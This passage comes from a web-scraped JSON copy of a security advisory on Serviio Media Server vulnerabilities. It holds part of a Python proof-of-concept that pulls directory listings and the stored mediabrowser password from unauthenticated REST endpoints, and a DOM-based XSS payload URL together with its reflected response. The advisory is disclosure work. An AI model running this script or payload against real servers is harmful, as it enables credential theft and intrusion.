class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-28\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;nPrinting directories:&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-29\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;n&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-30\"><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-31\"><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-33\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URLs <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">iter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;path&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">URLs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-36\"><span class=\"crayon-e\">print<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-38\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;Accept&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/xml&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-39\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;:&#8217;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/rest\/remote-access&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-40\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;nPrinting mediabrowser password:&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-41\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-n&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-42\"><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-43\"><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response_body<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-45\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URLs <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roottree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">iter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;remoteUserPassword&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">URLs<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-590905ee7e665132765932-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-590905ee7e665132765932-48\"><span class=\"crayon-v\">print<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0068 seconds] -->  <\/p>\n<p><strong>DOM-Based Cross-Site Scripting (XSS)<\/strong><br \/> Serviio is vulnerable to a DOM-based cross-site scripting. Data is read from document.location and passed to document.write() via the following statement in the response: document.write(&#8216;&lt;base href=&#8221;&#8216; + document.location + &#8216;&#8221; \/&gt;&#8217;); This can be exploited to execute arbitrary HTML and script code in a user&#8217;s browser DOM in context of an affected site.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An attacker sends the following request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e669133778818\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/172.19.0.214:23424\/mediabrowser\/#\/browse\/V_F?title=Folders&amp;b=Home&amp;b=Video&amp;bid=0&#8243;&gt;&amp;lt;script&gt;alert(&#8220;ZSL&#8221;)&lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e669133778818-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e669133778818-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.19.0.214:23424\/mediabrowser\/#\/browse\/V_F?title=Folders&amp;b=Home&amp;b=Video&amp;bid=0&#8243;&gt;&amp;lt;script&gt;alert(&#8220;ZSL&#8221;)&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>Element response:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-590905ee7e66c589708514\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;base href=&#8221;http:\/\/172.19.0.214:23424\/mediabrowser\/#\/login?title=Folders&amp;amp;b=Home&amp;amp;b=Video&amp;amp;bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E&#8221;&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-590905ee7e66c589708514-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-590905ee7e66c589708514-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">base <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/172.19.0.214:23424\/mediabrowser\/#\/login?title=Folders&amp;amp;b=Home&amp;amp;b=Video&amp;amp;bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio-dom-xss.jpg\" data-slb-active=\"1\" data-slb-asset=\"177528134\" data-slb-internal=\"0\" data-slb-group=\"3094\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3097\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio-dom-xss-300x158.jpg\" alt=\"\" width=\"300\" height=\"158\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio-dom-xss-300x158.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio-dom-xss-768x404.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio-dom-xss-1024x539.jpg 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3094\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/serviio_calc-300x50.png\"\/><\/p>\n<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 02 May 2017 10:58:33 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a five (5) vulnerabilities found in Serviio Media Server. Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1. Serviio is a free media server. It allows you to stream your media files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, games console or mobile phone) on &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3094\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Serviio Media Server Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11640,12135,11946,11682,10757,12136],"class_list":["post-7509","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-cross-site-scripting","tag-information-disclosure","tag-privilege-escalation","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7509"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7509\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}